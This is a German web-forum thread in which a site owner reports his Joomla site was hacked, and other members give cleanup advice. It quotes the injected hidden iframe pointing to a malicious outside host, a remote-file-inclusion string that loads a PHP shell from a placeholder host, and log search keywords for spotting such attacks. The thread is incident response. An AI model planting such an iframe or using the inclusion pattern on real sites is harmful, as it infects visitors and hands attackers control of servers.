Ergebnis 1 bis 7 von 7

Thema: Hacker auf Webseite

  1. #1
    Neu an Board
    Registriert seit
    07.05.2007
    Beiträge
    6
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Hacker auf Webseite

    Hallo, meine Seite wurde gehackt. Nun steht in der ersten zeile der Seite, wenn ich mir den Quelltext anschaue ein iframe. Hat jemand eine Idee wie der dahin kommen könnte??? Muss ja irgendwo in einem Script stehen. Ich finde aber nichts.

    <iframe width='1' height='1' border='0' frameborder='0' src='http://gashar.info/stds/go.php?sid=3'></iframe>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta **********="Content-Type" content="text/html;>charset=iso-8859-1" />
    <title>Team NoSports - Home</title>
    <meta name="description" content="Team No Sports NoSports TeamNOSports mountainbike bike marathon crosscountry einbeck mountainbiking alpencorss scott lars berd gerd helder thomas tino dassel northeim bikesport bikenews news MTB \&quot;team no Sports\&quot; \&quot;No Sports\&quot; rennrad rr downhill biketeam bike-team bike-news atb bikelinks bike-links links cc ddmc" />
    <meta name="keywords" content="Team No Sports NoSports TeamNOSports mountainbike bike marathon crosscountry einbeck mountainbiking alpencorss scott lars berd gerd helder thomas tino dassel northeim bikesport bikenews news MTB \&quot;team no Sports\&quot; \&quot;..............

  2. #2
    Hat hier eine Zweitwohnung Avatar von Lappsack
    Registriert seit
    10.10.2004
    Ort
    Chemnitz
    Beiträge
    1.170
    Bedankte sich
    13
    Erhielt 188 Danksagungen
    in 182 Beiträgen

    Standard

    Zitat Zitat von larsm Beitrag anzeigen
    Hallo, meine Seite wurde gehackt. Nun steht in der ersten zeile der Seite, wenn ich mir den Quelltext anschaue ein iframe. Hat jemand eine Idee wie der dahin kommen könnte??? Muss ja irgendwo in einem Script stehen. Ich finde aber nichts.
    hallo, hast du deine index.php und so weiter auch auf 777 stehen? Lade dir die Joomal12.zip und überspiele dir die index.php und schreibschütze sie
    Es grüsst dich herzlich

    The Lappsack
    ----------------------------------------------------------------------------
    Wer Rechschreibefehler findet, darf Sie wie immer behalten
    http://www.lappsack.de

  3. #3
    Neu an Board
    Registriert seit
    07.05.2007
    Beiträge
    6
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Hi, hab ich schon gemacht. Leider ohne Erfolg.

  4. #4
    Hat hier eine Zweitwohnung Avatar von Lappsack
    Registriert seit
    10.10.2004
    Ort
    Chemnitz
    Beiträge
    1.170
    Bedankte sich
    13
    Erhielt 188 Danksagungen
    in 182 Beiträgen

    Standard

    Zitat Zitat von larsm Beitrag anzeigen
    Hi, hab ich schon gemacht. Leider ohne Erfolg.
    Nimm mal eine anderes Template. Das ist doch sicher auch 777 bei dir oder?

    nur zum testen
    Geändert von Lappsack (08.05.2007 um 13:48 Uhr) Grund: sicher ist sicher
    Es grüsst dich herzlich

    The Lappsack
    ----------------------------------------------------------------------------
    Wer Rechschreibefehler findet, darf Sie wie immer behalten
    http://www.lappsack.de

  5. #5
    Neu an Board
    Registriert seit
    07.05.2007
    Beiträge
    6
    Bedankte sich
    0
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Da ist er dann auch drin. Ich hab auch schon ein Template neu installiert und auch da steht er drin. Auf 777 steht nichts. Ich hab auch schon den ganzen Quelltext nach dem iframe durchsucht -> Nichts. Könnte das aus der Datenbank kommen?

  6. #6
    chw
    chw ist offline
    Verbringt hier viel Zeit
    Registriert seit
    06.08.2006
    Beiträge
    832
    Bedankte sich
    2
    Erhielt 164 Danksagungen
    in 152 Beiträgen

    Standard

    Meine Glaskugel weiß bestimmt wie der dahin kommt...
    Benutze bitte mal die Suche, es gibt tausende gleicher Fragestellungen.

    Vorweg: Abslout sinnlos ist ein einfaches entfernen oder überschreiben der index.php
    Das behebt nicht die Lücke und garantiert auch nicht das noch andere schädliche Scripte auf dem Server verbleiben.

    Folgender Vorgehensweise halte ich für angebracht:

    - Logfiles vom hoster sichern bzw. Anfordern (alle die du bekommen kannst)
    - Alle Dateien auf die lokale Festplatte kopieren, inkl der Datenbank (wichtig!).
    - Dann alles (wirklich alles!) löschen.
    - nun die logfiles nach verdächtigem durchsuchen
    - Sicherheitslücke finden und beheben
    - Frisches joomla installieren und saubere Backupdateien draufspielen

    Wenn Du das Access_log nach folgenden Texten durchsuchst wirst Du warscheinlich schnell fündig: =http, wget, curl, mosconfig_
    Gleichzeitig durchsuchst Du die Liste mit bekannten unsicheren Komponenten (und diese hier) und schaust ob da eine Installiert war.

    Wenn das alles erfolglos war dann wende Dich an Deinen Hoster,
    es könnte auch sein das ein anderer Kunde auf dem Server die Ursache ist.

    EDIT
    Hintergrund des ganzen: Wenn Du die Index.php überspielst und meinetwegen auch noch 400 setzt,
    beibt die Lücke über die er zugriff erlangte ja weiterhin bestehen. Er kann dann z.B. einen php mailer hochladen und munter spam versenden. Meistens wird über eine Remotefile Inclusion "mosconfig_path=http://www.irgendwas,tdl/phpshell.gif) eine Mischung aus Filemanager und Shell hochgeladen. Da kann der dann mit den gleichen Rechten agieren wie joomla auch. Also Dateien anlegen, löschen, verändern.
    Wenn Du nun nur die unsichere Komponente entfernst kann es sein das diese datei (mit der shell) weiterhin auf dem Server bleibt. Somit kann er sich ganz einfach wieder zugriff verschaffen, das war auch mit der grund warum das tauschen der index.php nichts gebracht hat. Die Lücke bleibt ja bestehen.
    Die einzige lösung waäre ein dirketer Vergleich aller Daten und zwar Zeichen für Zeichen- sehr viel Arbeit ;-)
    Daher ist es einfacher eine komplette neuinstallation mit aktuellem joomla und Komponenten zu verwenden und nur template, grafiken usw. hochzuladen. Die Inhalte stehen ja in der Datenbank.

  7. Erhielt Danksagungen von:


  8. #7
    Neu an Board
    Registriert seit
    08.05.2007
    Ort
    Kiel
    Beiträge
    3
    Bedankte sich
    1
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Hallo ich habe das gleiche Problem,

    deshalb erst einmal vielen Dank an chw für die Tipps zur Vorgehensweise.

    @Lars: ich habe deine Seite eben besucht: Du scheinst das Problem gelöst zu haben. Bist du wie oben beschrieben vorgegangen und hast joomla und alle Komponenten neu installiert? Hast Du herausgefunden welche Komponente und was sonst für die Sicherheitslücke verantwortlich ist?

    Gruß Philipp

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein